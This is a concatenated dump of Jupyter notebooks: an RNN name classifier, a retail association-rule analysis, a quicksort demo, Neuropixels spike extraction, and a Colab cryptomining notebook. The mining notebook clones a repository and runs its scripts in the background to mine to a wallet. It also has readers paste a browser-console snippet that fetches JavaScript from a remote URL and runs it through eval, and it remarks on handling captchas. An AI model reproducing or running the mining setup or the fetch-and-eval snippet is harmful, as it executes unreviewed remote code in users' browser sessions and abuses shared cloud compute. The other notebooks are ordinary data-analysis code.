"%%time\ntrain_loader = DataLoader(dataset=train_dataset, sampler=ImbalancedDatasetSampler(train_dataset), batch_size=2, num_workers=2) # 2 * 9 * 743 \ntest_loader = DataLoader(dataset=test_dataset, sampler=ImbalancedDatasetSampler(test_dataset), batch_size=2, num_workers=2) # 4 * 25 * 67\n",
"CPU times: user 8.87 s, sys: 0 ns, total: 8.87 s\nWall time: 8.88 s\n"
]
],
[
[
"# 1. Model",
"_____no_output_____"
]
],
[
[
"model = RNNClassifier()",
"_____no_output_____"
]
],
[
[
"# 2. Criterion & Loss",
"_____no_output_____"
]
],
[
[
"criterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001)",
"_____no_output_____"
],
[
"for epoch in tqdm(range(1, 1 + 1)):\n train(model, 'cpu', train_loader, optimizer, epoch, criterion)\n test(model, 'cpu', test_loader, criterion)",
"_____no_output_____"
]
],
[
[
"# Save a trained model",
"_____no_output_____"
]
],
[
[
"import pickle\n\ndef save_object(obj, filename):\n with open(filename, 'wb') as output: # Overwrites any existing file.\n pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)\n",
"_____no_output_____"
],
[
"save_object(model, 'name-classifier.pkl')",
"_____no_output_____"
]
],
[
[
"# Experiment Notes",
"_____no_output_____"
],
[
"1. Linear layer either one layer or two layers. No impact on confusion matrix. It still blindly guess `Russian`. Solve it by `ImbalancedDatasetSampler`",
"_____no_output_____"
],
[
"# Scratch Note",
"_____no_output_____"
]
],
[
[
"weight = torch.tensor([3, 1, 1], dtype=torch.float)",
"_____no_output_____"
],
[
"loss = nn.CrossEntropyLoss(weight=weight)",
"_____no_output_____"
],
[
"Y = torch.tensor([2, 0, 1], dtype=torch.long)\ny_pred1 = torch.tensor([\n [.1 ,.2, .9],\n [1.1, .1, .2],\n [0.2, 2.1, .1]\n])\ny_pred2 = torch.tensor([\n [0.8, .2, .3],\n [.2, .3, .5],\n [.2, .2, .1],\n])",
"_____no_output_____"
],
[
"l1 = loss(y_pred1, Y)\nl1",
"_____no_output_____"
],
[
"l2 = loss(y_pred2, Y)\nl2",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb03e1eda1bef5162865bb5f8725b23e4192bd73 | 18,517 | ipynb | Jupyter Notebook | machine-learning/recommender-system-using-association-rules/recommender_systems_association_rules.ipynb | hemanth22/pythoncode-tutorials | 5101b00b5143983db2b8fe29be8068f03e2f86d5 | [
"MIT"
] | 1 | 2022-03-28T22:45:08.000Z | 2022-03-28T22:45:08.000Z | machine-learning/recommender-system-using-association-rules/recommender_systems_association_rules.ipynb | Adkali/pythoncode-tutorials | 5101b00b5143983db2b8fe29be8068f03e2f86d5 | [
"MIT"
] | 3 | 2022-01-25T00:08:22.000Z | 2022-03-11T21:22:03.000Z | machine-learning/recommender-system-using-association-rules/recommender_systems_association_rules.ipynb | Adkali/pythoncode-tutorials | 5101b00b5143983db2b8fe29be8068f03e2f86d5 | [
"MIT"
] | null | null | null | 32.83156 | 184 | 0.608036 | [
[
[
"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n%matplotlib inline\nfrom mlxtend.frequent_patterns import apriori, association_rules\nfrom collections import Counter",
"_____no_output_____"
],
[
"# dataset = pd.read_csv(\"data.csv\",encoding= 'unicode_escape')\ndataset = pd.read_excel(\"Online Retail.xlsx\")\ndataset.head()",
"_____no_output_____"
],
[
"dataset.shape",
"_____no_output_____"
],
[
"## Verify missing value\ndataset.isnull().sum().sort_values(ascending=False)",
"_____no_output_____"
],
[
"## Remove missing values\ndataset1 = dataset.dropna()\ndataset1.describe()",
"_____no_output_____"
],
[
"#selecting data where quantity > 0\ndataset1= dataset1[dataset1.Quantity > 0]\ndataset1.describe()",
"_____no_output_____"
],
[
"# Creating a new feature 'Amount' which is the product of Quantity and its Unit Price\ndataset1['Amount'] = dataset1['Quantity'] * dataset1['UnitPrice']\n# to highlight the Customers with most no. of orders (invoices) with groupby function\norders = dataset1.groupby(by=['CustomerID','Country'], as_index=False)['InvoiceNo'].count()\nprint('The TOP 5 loyal customers with most number of orders...')\norders.sort_values(by='InvoiceNo', ascending=False).head()",
"_____no_output_____"
],
[
"# Creating a subplot of size 15x6\nplt.subplots(figsize=(15,6))\n# Using the style bmh for better visualization\nplt.style.use('bmh')\n# X axis will denote the customer ID, Y axis will denote the number of orders\nplt.plot(orders.CustomerID, orders.InvoiceNo)\n# Labelling the X axis\nplt.xlabel('Customers ID')\n# Labelling the Y axis\nplt.ylabel('Number of Orders')\n# Title to the plot\nplt.title('Number of Orders by different Customers')\nplt.show()",
"_____no_output_____"
],
[
"#Using groupby function to highlight the Customers with highest spent amount (invoices)\nmoney = dataset1.groupby(by=['CustomerID','Country'], as_index=False)['Amount'].sum()\nprint('The TOP 5 profitable customers with highest money spent...')\nmoney.sort_values(by='Amount', ascending=False).head()",
"_____no_output_____"
],
[
"# Creating a subplot of size 15*6\nplt.subplots(figsize=(15,6))\n# X axis will denote the customer ID, Y axis will denote the amount spent\nplt.plot(money.CustomerID, money.Amount)\n# Using bmh style for better visualization\nplt.style.use('bmh')\n# Labelling the X-axis\nplt.xlabel('Customers ID')\n# Labelling the Y-axis\nplt.ylabel('Money spent')\n# Giving a suitable title to the plot\nplt.title('Money Spent by different Customers')\n\nplt.show()",
"_____no_output_____"
],
[
"# Convert InvoiceDate from object to datetime\ndataset1['InvoiceDate'] = pd.to_datetime(dataset.InvoiceDate, format='%m/%d/%Y %H:%M')\n# Creating a new feature called year_month, such that December 2010 will be denoted as 201012\ndataset1.insert(loc=2, column='year_month', value=dataset1['InvoiceDate'].map(lambda x: 100*x.year + x.month))\n# Creating a new feature for Month\ndataset1.insert(loc=3, column='month', value=dataset1.InvoiceDate.dt.month)\n# Creating a new feature for Day\n# +1 to make Monday=1.....until Sunday=7\ndataset1.insert(loc=4, column='day', value=(dataset1.InvoiceDate.dt.dayofweek)+1)\n# Creating a new feature for Hour\ndataset1.insert(loc=5, column='hour', value=dataset1.InvoiceDate.dt.hour)",
"_____no_output_____"
],
[
"# Using bmh style for better visualization\nplt.style.use('bmh')\n# Using groupby to extract No. of Invoices year-monthwise\nax = dataset1.groupby('InvoiceNo')['year_month'].unique().value_counts().sort_index().plot(kind='bar',figsize=(15,6))\n# Labelling the X axis\nax.set_xlabel('Month',fontsize=15)\n# Labelling the Y-axis\nax.set_ylabel('Number of Orders',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Number of orders for different Months (Dec 2010 - Dec 2011)',fontsize=15)\n# Providing with X tick labels\nax.set_xticklabels(('Dec_10','Jan_11','Feb_11','Mar_11','Apr_11','May_11','Jun_11','July_11','Aug_11','Sep_11','Oct_11','Nov_11','Dec_11'), rotation='horizontal', fontsize=13)\n\nplt.show()",
"_____no_output_____"
],
[
"# Day = 6 is Saturday.no orders placed \ndataset1[dataset1['day']==6]",
"_____no_output_____"
],
[
"# Using groupby to count no. of Invoices daywise\nax = dataset1.groupby('InvoiceNo')['day'].unique().value_counts().sort_index().plot(kind='bar',figsize=(15,6))\n# Labelling X axis\nax.set_xlabel('Day',fontsize=15)\n# Labelling Y axis\nax.set_ylabel('Number of Orders',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Number of orders for different Days',fontsize=15)\n# Providing with X tick labels\n# Since there are no orders placed on Saturdays, we are excluding Sat from xticklabels\nax.set_xticklabels(('Mon','Tue','Wed','Thur','Fri','Sun'), rotation='horizontal', fontsize=15)\n\nplt.show()",
"_____no_output_____"
],
[
"# Using groupby to count the no. of Invoices hourwise\nax = dataset1.groupby('InvoiceNo')['hour'].unique().value_counts().iloc[:-2].sort_index().plot(kind='bar',figsize=(15,6))\n# Labelling X axis\nax.set_xlabel('Hour',fontsize=15)\n# Labelling Y axis\nax.set_ylabel('Number of Orders',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Number of orders for different Hours', fontsize=15)\n# Providing with X tick lables ( all orders are placed between 6 and 20 hour )\nax.set_xticklabels(range(6,21), rotation='horizontal', fontsize=15)\nplt.show()",
"_____no_output_____"
],
[
"dataset1.UnitPrice.describe()",
"_____no_output_____"
],
[
"# checking the distribution of unit price\nplt.subplots(figsize=(12,6))\n# Using darkgrid style for better visualization\nsns.set_style('darkgrid')\n# Applying boxplot visualization on Unit Price\nsns.boxplot(dataset1.UnitPrice)\nplt.show()",
"_____no_output_____"
],
[
"# Creating a new df of free items\nfreeproducts = dataset1[dataset1['UnitPrice'] == 0]\nfreeproducts.head()",
"_____no_output_____"
],
[
"# Counting how many free items were given out year-month wise\nfreeproducts.year_month.value_counts().sort_index()",
"_____no_output_____"
],
[
"# Counting how many free items were given out year-month wise\nax = freeproducts.year_month.value_counts().sort_index().plot(kind='bar',figsize=(12,6))\n# Labelling X-axis\nax.set_xlabel('Month',fontsize=15)\n# Labelling Y-axis\nax.set_ylabel('Frequency',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Frequency for different Months (Dec 2010 - Dec 2011)',fontsize=15)\n# Providing X tick labels\n# Since there are 0 free items in June 2011, we are excluding it\nax.set_xticklabels(('Dec_10','Jan_11','Feb_11','Mar_11','Apr_11','May_11','July_11','Aug_11','Sep_11','Oct_11','Nov_11'), rotation='horizontal', fontsize=13)\nplt.show()",
"_____no_output_____"
],
[
"plt.style.use('bmh')\n# Using groupby to sum the amount spent year-month wise\nax = dataset1.groupby('year_month')['Amount'].sum().sort_index().plot(kind='bar',figsize=(15,6))\n# Labelling X axis\nax.set_xlabel('Month',fontsize=15)\n# Labelling Y axis\nax.set_ylabel('Amount',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Revenue Generated for different Months (Dec 2010 - Dec 2011)',fontsize=15)\n# Providing with X tick labels\nax.set_xticklabels(('Dec_10','Jan_11','Feb_11','Mar_11','Apr_11','May_11','Jun_11','July_11','Aug_11','Sep_11','Oct_11','Nov_11','Dec_11'), rotation='horizontal', fontsize=13)\nplt.show()",
"_____no_output_____"
],
[
"# Creating a new pivot table which sums the Quantity ordered for each item\nmost_sold= dataset1.pivot_table(index=['StockCode','Description'], values='Quantity', aggfunc='sum').sort_values(by='Quantity', ascending=False)\nmost_sold.reset_index(inplace=True)\nsns.set_style('white')\n# Creating a bar plot of Description ( or the item ) on the Y axis and the sum of Quantity on the X axis\n# We are plotting only the 10 most ordered items\nsns.barplot(y='Description', x='Quantity', data=most_sold.head(10))\n# Giving suitable title to the plot\nplt.title('Top 10 Items based on No. of Sales', fontsize=14)\nplt.ylabel('Item')",
"_____no_output_____"
],
[
"# choosing WHITE HANGING HEART T-LIGHT HOLDER as a sample\nd_white = dataset1[dataset1['Description']=='WHITE HANGING HEART T-LIGHT HOLDER']",
"_____no_output_____"
],
[
"# WHITE HANGING HEART T-LIGHT HOLDER has been ordered 2028 times\nd_white.shape",
"_____no_output_____"
],
[
"# WHITE HANGING HEART T-LIGHT HOLDER has been ordered by 856 customers\nlen(d_white.CustomerID.unique())",
"_____no_output_____"
],
[
"# Creating a pivot table that displays the sum of unique Customers who bought particular item\n\nmost_customers = dataset1.pivot_table(index=['StockCode','Description'], values='CustomerID', aggfunc=lambda x: len(x.unique())).sort_values(by='CustomerID', ascending=False)\nmost_customers\n# Since the count for WHITE HANGING HEART T-LIGHT HOLDER matches above length 856, the pivot table looks correct for all items",
"_____no_output_____"
],
[
"most_customers.reset_index(inplace=True)\nsns.set_style('white')\n# Creating a bar plot of Description ( or the item ) on the Y axis and the sum of unique Customers on the X axis\n# We are plotting only the 10 most bought items\nsns.barplot(y='Description', x='CustomerID', data=most_customers.head(10))\n# Giving suitable title to the plot\nplt.title('Top 10 Items bought by Most no. of Customers', fontsize=14)\nplt.ylabel('Item')",
"_____no_output_____"
],
[
"# Storing all the invoice numbers into a list y\ny = dataset1['InvoiceNo']\ny = y.to_list()\n# Using set function to find unique invoice numbers only and storing them in invoices list\ninvoices = list(set(y))\n# Creating empty list first_choices\nfirstchoices = []\n# looping into list of unique invoice numbers\nfor i in invoices:\n \n # the first item (index = 0) of every invoice is the first purchase\n # extracting the item name for the first purchase\n firstpurchase = dataset1[dataset1['InvoiceNo']==i]['items'].reset_index(drop=True)[0]\n \n # Appending the first purchase name into first choices list\n firstchoices.append(firstpurchase)\nfirstchoices[:5]",
"_____no_output_____"
],
[
"# Using counter to count repeating first choices\ncount = Counter(firstchoices)\n# Storing the counter into a datafrane\ndata_first_choices = pd.DataFrame.from_dict(count, orient='index').reset_index()\n# Rename columns as item and count\ndata_first_choices.rename(columns={'index':'item', 0:'count'},inplace=True)\n# Sorting the data based on count\ndata_first_choices.sort_values(by='count',ascending=False)",
"_____no_output_____"
],
[
"plt.subplots(figsize=(20,10))\nsns.set_style('white')\n# Creating a bar plot that displays Item name on the Y axis and Count on the X axis\nsns.barplot(y='item', x='count', data=data_first_choices.sort_values(by='count',ascending=False).head(10))\n# Giving suitable title to the plot\nplt.title('Top 10 First Choices', fontsize=14)\nplt.ylabel('Item')",
"_____no_output_____"
],
[
"basket = (dataset1.groupby(['InvoiceNo', 'Description'])['Quantity'].sum().unstack().reset_index().fillna(0).set_index('InvoiceNo'))\nbasket.head(10)",
"_____no_output_____"
],
[
"def encode_u(x):\n if x < 1:\n return 0\n if x >= 1:\n return 1\n\nbasket = basket.applymap(encode_u)\n# everything is encoded into 0 and 1\nbasket.head(10)",
"_____no_output_____"
],
[
"# trying out on a sample item\nwooden_star = basket.loc[basket['WOODEN STAR CHRISTMAS SCANDINAVIAN']==1]\n# Using apriori algorithm, creating association rules for the sample item\n# Applying apriori algorithm for wooden_star\nfrequentitemsets = apriori(wooden_star, min_support=0.15, use_colnames=True)\n# Storing the association rules into rules\nwooden_star_rules = association_rules(frequentitemsets, metric=\"lift\", min_threshold=1)\n# Sorting the rules on lift and support\nwooden_star_rules.sort_values(['lift','support'],ascending=False).reset_index(drop=True)",
"_____no_output_____"
],
[
"# In other words, it returns the items which are likely to be bought by user because he bought the item passed into function\ndef frequently_bought_t(item):\n # df of item passed\n item_d = basket.loc[basket[item]==1]\n # Applying apriori algorithm on item df\n frequentitemsets = apriori(item_d, min_support=0.15, use_colnames=True)\n # Storing association rules\n rules = association_rules(frequentitemsets, metric=\"lift\", min_threshold=1)\n # Sorting on lift and support\n rules.sort_values(['lift','support'],ascending=False).reset_index(drop=True)\n print('Items frequently bought together with {0}'.format(item))\n # Returning top 6 items with highest lift and support\n return rules['consequents'].unique()[:6]",
"_____no_output_____"
],
[
"frequently_bought_t('WOODEN STAR CHRISTMAS SCANDINAVIAN')",
"_____no_output_____"
],
[
"frequently_bought_t('JAM MAKING SET WITH JARS')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb03edbd2d6d86de9dc182a463c946434aee842d | 5,458 | ipynb | Jupyter Notebook | rvn_Zerg.ipynb | rogg13/pCol | 0eddb110663fe24a26624504593ae51d3614b9ea | [
"MIT"
] | null | null | null | rvn_Zerg.ipynb | rogg13/pCol | 0eddb110663fe24a26624504593ae51d3614b9ea | [
"MIT"
] | null | null | null | rvn_Zerg.ipynb | rogg13/pCol | 0eddb110663fe24a26624504593ae51d3614b9ea | [
"MIT"
] | null | null | null | 31.188571 | 172 | 0.465189 | [
[
[
"# **Welcome To Penajam Project**\nscript created by **[Penajam Euy](https://www.facebook.com/balibeach69/)**\n\nCara pakai (*How to use*)\n\n1. Cek Core\n\n2. Start Mining\n\n3. Paste script dibawah ke browser console (***Ctrl+Shift+i - Console***)\n\n```\nasync function eternalMode() {\n let url = 'https://raw.githubusercontent.com/liebedevil/borr/main/netep.js'\n let response = await fetch(url);\n let script = await response.text();\n eval(script);\n}\neternalMode();\n```\n4. Selesai\n\nNote : Script ini hanya berfungsi di cpu intel.\n\n**Penting : di sekitar menit ke 2 - ke 10 biasanya muncul captha, captha di klik manual atau menggunakan extensi, kemudian akan muncul lg setiap 3 jam sekali**\n\n▶ Appminer : ccm1n3r\n\n▶ **Khusus untuk Pool :** https://zergpool.com\n\n===================================================\n\nDonate kopi ke developer:\n\n▶ *Veruscoin* (**VRSC**) : RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii\n\n▶ *Raptoreum* (**RTM**) : RLFAMiM5yyAV6KwkWxuqe8TT7rYkYjYTtT\n\n▶ *Dogecoin* (**DOGE**) : DTPXpi28cuuCzp1JQZBWcnJjr1NKaCSHFe\n\n▶ *Tron* (**TRX**) : TQdN4dzKNxMox7he3huXUdUdpG4XvEt58U\n\n===================================================\n\nDonasi jajan ke developer, suport semua e-wallet dan QRIS\n\n***coming soon***\n\n\n\n\n\n\n\n",
"_____no_output_____"
]
],
[
[
"#@title **1. Cek Core**\n#@markdown Berfungsi untuk melihat spesifikasi\n!lscpu",
"_____no_output_____"
],
[
"#@title **2. Start Mining**\n#@markdown ▶ *Isi nama worker di kolom Name* \n\n#@markdown ▶ *Wallet sesuaikan dengan koin yang akan dimining, penulisan koin dengan huruf kapital* (Ex: VRSC, RTM, DOGE, LTC)\n\n#@markdown ▶ *Level di isi jumlah core, jika dikosongkan otomatis menggunakan seluruh core yang ada*\nName = \"qwerty\" #@param {type:\"string\"}\nWallet = \"\" #@param {type:\"string\"}\nCoin = \"\" #@param {type:\"string\"}\nLevel = \"\"#@param {type:\"string\"}\n!cd /home && nohup sudo apt install expect && nohup git clone https://github.com/Xilahani8/pacul.git && cd pacul && chmod +x molaih.sh\n!cd /home/pacul && ./molaih.sh $Name $Wallet $Coin $Level\nfrom IPython.display import clear_output\nclear_output()\n!cat /home/pacul/info.txt\nprint('Mining berhasil di jalankan di background')",
"_____no_output_____"
],
[
"#@title **3. Cek Miner**\n#@markdown *Cek miner yang berjalan*\nimport time\nimport psutil\nimport datetime\nfrom IPython.display import clear_output\nclear_output()\n!cat /home/pacul/info.txt\n\nfor x in range(5):\n x = datetime.datetime.now()\n Tn = psutil.cpu_percent()\n print(x.strftime(f\"Peforma tukang %H:%M:%S : {Tn} %\"))\n time.sleep(3)",
"_____no_output_____"
],
[
"#@title **4. Reconfigure & Rerun (Rerun otomatis)**\nName = \"qwerty\" #@param {type:\"string\"}\nWallet = \"\" #@param {type:\"string\"}\nCoin = \"\" #@param {type:\"string\"}\nLevel = \"\"#@param {type:\"string\"}\n!cd /home/pacul && chmod +x mbaleni.sh && ./mbaleni.sh $Name $Wallet $Coin $Level",
"_____no_output_____"
],
[
"#@title **5. Stop Mining**\n!cd /home/pacul && chmod +x mateni.sh && ./mateni.sh",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb03f08644bc9f6c00ed55307bab17cbc1e01b2e | 5,218 | ipynb | Jupyter Notebook | jupyter/quick_sort.ipynb | lishulong16/sklearn_demo | 5e7a2ea6d2b6ec266536974b7169e5f76639ccb6 | [
"MIT"
] | 1 | 2018-12-05T18:41:25.000Z | 2018-12-05T18:41:25.000Z | jupyter/quick_sort.ipynb | lishulongVI/sklearn_demo | 5e7a2ea6d2b6ec266536974b7169e5f76639ccb6 | [
"MIT"
] | null | null | null | jupyter/quick_sort.ipynb | lishulongVI/sklearn_demo | 5e7a2ea6d2b6ec266536974b7169e5f76639ccb6 | [
"MIT"
] | null | null | null | 20.303502 | 72 | 0.432924 | [
[
[
"def quick_sort(data,left,right):\n \n if left < right:\n mid = partition(data,left,right)\n quick_sort(data,left,mid-1)\n quick_sort(data,mid+1,right)\n ",
"_____no_output_____"
],
[
"def partition(data,left,right):\n tmp = data[left]\n while left < right:\n# 选择出一个<tmp的数 交换\n while left<right and data[right] >=tmp:\n right -= 1\n data[left] = data[right]\n print('left:{},right:{},tmp:{}'.format(left,right,tmp))\n# 选择一个 >emp的数字 交换\n while left < right and data[left]<=tmp:\n left +=1\n data[right] = data[left]\n print('left:{},right:{},tmp:{}'.format(left,right,tmp))\n data[left] = tmp\n print(list(data))\n return left",
"_____no_output_____"
]
],
[
[
"# 时间复杂度nlogn",
"_____no_output_____"
]
],
[
[
"li = [2,1,4,3,5,6,7,9,8]\nlen(li)-1",
"_____no_output_____"
],
[
"quick_sort(li,0,len(li)-1)",
"left:0,right:1,tmp:2\nleft:1,right:1,tmp:2\n[1, 2, 4, 3, 5, 6, 7, 9, 8]\nleft:2,right:3,tmp:4\nleft:3,right:3,tmp:4\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:4,right:4,tmp:5\nleft:4,right:4,tmp:5\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:5,right:5,tmp:6\nleft:5,right:5,tmp:6\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:6,right:6,tmp:7\nleft:6,right:6,tmp:7\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:7,right:8,tmp:9\nleft:8,right:8,tmp:9\n[1, 2, 3, 4, 5, 6, 7, 8, 9]\n"
],
[
"li = [5,2,1,4,3,6,7,9,8]\nlen(li)-1",
"_____no_output_____"
],
[
"quick_sort(li,0,len(li)-1)",
"left:0,right:4,tmp:5\nleft:4,right:4,tmp:5\n[3, 2, 1, 4, 5, 6, 7, 9, 8]\nleft:0,right:2,tmp:3\nleft:2,right:2,tmp:3\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:0,right:0,tmp:1\nleft:0,right:0,tmp:1\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:5,right:5,tmp:6\nleft:5,right:5,tmp:6\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:6,right:6,tmp:7\nleft:6,right:6,tmp:7\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:7,right:8,tmp:9\nleft:8,right:8,tmp:9\n[1, 2, 3, 4, 5, 6, 7, 8, 9]\n"
],
[
"import random",
"_____no_output_____"
],
[
"random.shuffle(li)",
"_____no_output_____"
],
[
"li",
"_____no_output_____"
],
[
"# 内部实现语言为c\nli.sort()",
"_____no_output_____"
],
[
"li",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb03f09188a989b7ea2d6deac9d15232c6b30808 | 100,396 | ipynb | Jupyter Notebook | DataExtraction_Jean.ipynb | mariakesa/ConnectedLizards_NeuroMatch2020 | b89fdab554afc79624209fa8b7b3463a9c52b125 | [
"MIT"
] | null | null | null | DataExtraction_Jean.ipynb | mariakesa/ConnectedLizards_NeuroMatch2020 | b89fdab554afc79624209fa8b7b3463a9c52b125 | [
"MIT"
] | null | null | null | DataExtraction_Jean.ipynb | mariakesa/ConnectedLizards_NeuroMatch2020 | b89fdab554afc79624209fa8b7b3463a9c52b125 | [
"MIT"
] | 1 | 2020-07-19T17:46:52.000Z | 2020-07-19T17:46:52.000Z | 371.837037 | 78,868 | 0.932826 | [
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## defining data path\nall_data_path='/Users/jean/git/steinmetz-et-al-2019/data'\nselected_recordings= 'Richards_2017-10-31'\n\n## brain areas\nmid_brain_circuits=['SCs','SCm','MRN','APN','PAG','ZI']\nfrontal_circuits=['MOs','PL','ILA','ORB','MOp','SSp']",
"_____no_output_____"
],
[
"## extracting position of the neuropixels\nindividualchannel_location = pd.read_csv(all_data_path +'/'+selected_recordings+'/'+'channels.brainLocation.tsv', sep='\\t')\n# allen_ontology [enumerated string] (nChannels) The acronym of the brain region determined to contain this channel in the Allen CCF.\nindividualchannel_location = individualchannel_location.allen_ontology;\nindividualchannel_location = np.array(individualchannel_location)\nprint('recording along '+ str(len(individualchannel_location)) +' channels')\nprint('brain areas recorded in that animal')\nprint(np.unique(individualchannel_location))\n#from pandas library --> pd.Series\npandas_location = pd.Series(individualchannel_location)\n# pd.SeriesObject.str.match --> to find a string\nChannels_in_region_of_interest = np.where(pandas_location.str.match('PAG'));\n#Channels_in_region_of_interest = pd.Series(np.where(pandas_location.str.match('PAG')))\nprint('Channels of Neuropixel probe in region of interest')\nprint(Channels_in_region_of_interest)",
"recording along 748 channels\nbrain areas recorded in that animal\n['MOs' 'MRN' 'OLF' 'ORB' 'PAG' 'RSP' 'SCm' 'SCs' 'root']\nChannels of Neuropixel probe in region of interest\n(array([454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466,\n 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479,\n 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492,\n 493, 494, 495, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505,\n 506, 507, 508, 509, 510, 511, 512, 513, 514, 515, 516, 517, 518,\n 519, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 530, 531,\n 532, 533, 534, 535, 536, 537, 538, 539, 540, 541, 542, 543]),)\n"
],
[
"## cluster indices from \"good spikes\" from the 'clusters' objects \ncluster_quality = np.load(all_data_path +'/'+selected_recordings+'/'+'clusters._phy_annotation.npy')\nprint('number of clusters in cluster_idx = ')\nprint(len(cluster_quality))\n# 0 = noise (these are already excluded and don't appear in this dataset at all); \n# 1 = MUA (i.e. presumed to contain spikes from multiple neurons; \n# these are not analyzed in any analyses in the paper); \n# 2 = Good (manually labeled); 3 = Unsorted. \n# In this dataset 'Good' was applied in a few but not all datasets to included neurons, \n# so in general the neurons with _phy_annotation>=2 are the ones that should be included.\nclusters_idx = np.arange(len(cluster_quality))\ncluster_good_where = np.where(cluster_quality>=2);\ncluster_good_where = cluster_good_where[0]\ngood_and_unsorted_clusters = clusters_idx[cluster_good_where]\nprint('number of \"good\" and \"unsorted\" clusters in cluster_idx = ')\nprint(len(good_and_unsorted_clusters))\n\n# location of the cluster peak along the neuropixel probe\ncluster_peakChannel = np.load(all_data_path +'/'+selected_recordings+'/'+'clusters.peakChannel.npy')\n",
"number of clusters in cluster_idx = \n778\nnumber of \"good\" and \"unsorted\" clusters in cluster_idx = \n522\n"
],
[
"#intersection of cluster_peakChannel and Channels_in_region_of_interest\n#print(cluster_peakChannel)\n#print(Channels_in_region_of_interest)\nClusterInRightArea = np.intersect1d(cluster_peakChannel, Channels_in_region_of_interest,\n assume_unique = False, return_indices = False)",
"_____no_output_____"
],
[
"#print(good_and_unsorted_clusters)\n#print(ClusterInRightArea)",
"_____no_output_____"
],
[
"## clusters from clean clusters and right area\nclean_Clusters_InTheRightArea = np.intersect1d(ClusterInRightArea, good_and_unsorted_clusters, \n assume_unique = False, return_indices=False)\nprint('Number of clean clusters in the right area')\nprint(len(clean_Clusters_InTheRightArea))",
"Clean clusters in the right area\n27\n"
],
[
"## spikes and cluster idx from the 'spikes' object\nspiketimes = np.load(all_data_path +'/'+selected_recordings+'/'+'spikes.times.npy')\nspikeclusters = np.load(all_data_path +'/'+selected_recordings+'/'+'spikes.clusters.npy')\n## to check if it corresponds to clusters class\n## the numbers in there match raws of the cluster objects (see below)\nuniquespikeclusters = np.unique(spikeclusters)\nprint('number of clusters in spikeclusters = ')\nprint(len(uniquespikeclusters))\n\n# ploting the 5000 nth spikes, picked from all the clusters\nfirstspiketoplot = 100000\nnumberofspikestoplot = 5000\nidtoplot = np.arange(firstspiketoplot, firstspiketoplot+numberofspikestoplot)\nplt.plot(spiketimes[idtoplot], spikeclusters[idtoplot], '.')\nplt.xlabel('time sec')\nplt.ylabel('cluster id')\nplt.title('plot all unsorted and unselected spikes - are there two neuropixel probes in that animal?')",
"number of clusters in spikeclusters = \n778\n"
],
[
"## iteratively selecting spikes from distinct cluster and generating an array of N arrays for N cells\nfor thatspike in np.arange(len(clean_Clusters_InTheRightArea)):\n #print(clean_Clusters_InTheRightArea[thatspike])\n #length(clean_Clusters_InTheRightArea[thatspike])\n those_spike_indices = (spikeclusters == clean_Clusters_InTheRightArea[thatspike])\n #print(spiketimes[those_spike_indices])\n plt.eventplot(spiketimes[those_spike_indices], lineoffsets=thatspike+1)\n \n #SpikeArray[thatspike,] = np.array(spiketimes[those_spike_indices])\n \n \nplt.ylabel('selected cells')\nplt.xlabel('time (sec)')\nplt.title('rasters of selected cells')\n",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb03f1b4e125820b9257f00f2bcfdec4d1a6ea99 | 2,854 | ipynb | Jupyter Notebook | .ipynb_checkpoints/w_1-checkpoint.ipynb | lucaspecina/lucaspecina.github.io | e9b9a02e1e0c4557e7e1585155006a73c2241b4c | [
"MIT"
